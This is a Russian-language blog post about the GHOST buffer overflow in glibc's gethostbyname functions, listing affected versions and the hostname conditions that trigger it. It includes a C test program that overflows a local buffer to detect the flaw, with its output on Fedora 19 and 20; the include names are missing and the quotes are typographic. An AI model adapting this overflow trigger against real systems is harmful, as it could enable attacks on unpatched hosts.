Внимание, привиденьки!

71554ee628b682412d1ea44dddfddc71

Собственно, 27.01.2015 была опубликована информация о уязвимости в библиотеке libc (в функциях gethostbyname() и gethostbyname2()).

Уязвимость обнаружена в библиотеке начиная с версии glibc-2.2, от 10.11.2000г., т.е. дистрибутивы использующие более раннюю версию, данной проблемы не имеют.

Ошибке было присвоено имя GHOST («призрак») — сокращение, обыгрывающее названия уязвимых функций gethostbyname() и gethostbyname2().

Где то между версиями glibc-2.17 и glibc-2.18 был выпущен патч, закрывающий эту дыру, но т.к. он не был помечен как “security fix”, то в LTS дистрибутивах проблема не решилась.

Но не все так плохо, дело в том, что есть много ньюансов. Что бы переполнить буфер, доменное имя должно:

1. начинаться с цифры;

2. заканчиваться НЕ на точку;

3. состоять только из цифр и точек;

4. быть достаточно длинным, что бы переполнить буфер (т.е. фактически больше 1 килобайта);

Проверить уязвим ли ваш дистрибутив можно скомпилировав вот этот эксплоит:


[user@...ora-19 ~]$ cat > GHOST.c << EOF
#include
#include
#include
#include
#include

#define CANARY “in_the_coal_mine”

struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { “buffer”, CANARY };

int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;

/*** strlen (name) = size_needed – sizeof (*host_addr) – sizeof (*h_addr_ptrs) – 1; ***/
size_t len = sizeof(temp.buffer) – 16*sizeof(unsigned char) – 2*sizeof(char *) – 1;
char name[sizeof(temp.buffer)];
memset(name, ‘0’, len);
name[len] = ‘\0’;

retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

if (strcmp(temp.canary, CANARY) != 0) {
puts(“vulnerable”);
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts(“not vulnerable”);
exit(EXIT_SUCCESS);
}
puts(“should not happen”);
exit(EXIT_FAILURE);
}
EOF

В результате получим ответ:

 
[user@...ora-19 ~]$ gcc GHOST.c -o GHOST

В Fedora 19 (glibc-2.17):

[user@...ora-19 ~]$ ./GHOST
vulnerable

В Fedora 20 (glibc-2.18):

[user@...ora-20 ~]$ ./GHOST
not vulnerable

Добавить комментарий

Войти с помощью: